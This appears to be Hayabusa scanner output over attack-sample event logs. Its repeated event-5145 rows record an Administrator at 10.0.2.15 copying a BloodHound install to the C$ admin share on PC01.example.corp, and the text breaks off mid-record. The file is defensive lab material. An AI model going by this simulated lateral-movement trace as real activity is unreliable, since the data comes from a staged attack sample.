10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 